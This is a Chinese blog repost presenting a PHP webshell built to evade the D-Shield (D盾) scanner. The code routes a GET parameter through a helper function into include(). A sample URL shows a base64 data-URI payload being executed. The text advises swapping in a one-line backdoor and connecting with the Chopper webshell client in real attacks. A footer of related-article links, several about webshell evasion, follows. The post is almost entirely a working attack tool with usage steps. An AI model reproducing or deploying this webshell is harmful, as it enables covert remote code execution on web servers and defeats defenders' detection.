最新绕过D盾的php Webshell
2020-03-31 07:20
2521 查看
去年分析D盾的查杀规律弄的绕过。
查杀效果:
具体请看代码:
<?php function cc(){ global $b; $a =$_GET[$b]; //此处可改成POST方式 $str =$a; return $str; } ?> <?php $b="url"; $c=cc(); $aa = $c; include($aa);
传入参数方式:
http://127.0.0.1/test/include.php?url=本地或远程文件名(或者利用data:image/png的这种格式)
例如:
http://127.0.0.1/test/include.php?url=data:image/png;base64,PD9waHAgcGhwaW5mbygpOyA/Pg==
上看base64,后面为要执行的代码,代码要带,实战中可以把代码改成一句话,然后使用菜刀连接即可。
原文地址:https://bacde.me/post/Webshellkill-Bypass-Php-Webshell/
- 点赞
- 收藏
- 分享
- 文章举报
相关文章推荐
- 整理的最新WebSHell (php过狗一句话,过狗菜刀,2016过狗一句话,2016php免杀一句话)
- php webshell分析和绕过waf技巧
- PHP Webshell下绕过disable_function的方法
- webshell 关键字绕过之php动态函数调用
- 整理的最新WebSHell (php过狗一句话,过狗菜刀,2016过狗一句话,2016php免杀一句话)
- 通过非数字和字符的方式实现PHP WebShell
- SQL绕过注入最新代码
- BasicPHP 框架 1.0.8 最新更新
- 最新报道:广州传智播客PHP培训确定要开班拉
- LNMP 最新版本+YUM方式安装指南(CentOS5.5 + Nginx 1.0.x + MySQL 5.5.x + PHP 5.3.x)
- php webshell code
- php读取LOG文件前N行。根据文件关键字,读取文件夹下最新的文件
- 实用PHP脚本:最新县及县以上行政区划代码
- 2017最新PHP经典面试题目汇总(上篇)
- php offset特征造成的绕过漏洞详解
- 2019阿里最新PHP开发工程师面试真题(部分)
- Apache+php+mysql在windows下的安装与配置图解 写的还不错也算经典新手看看 熟手绕过
- php最新银联支付chinaPay,最新接口地址
- php 正则判断是否是手机号码 最新
- 2019最新传智PHP基础班+就业班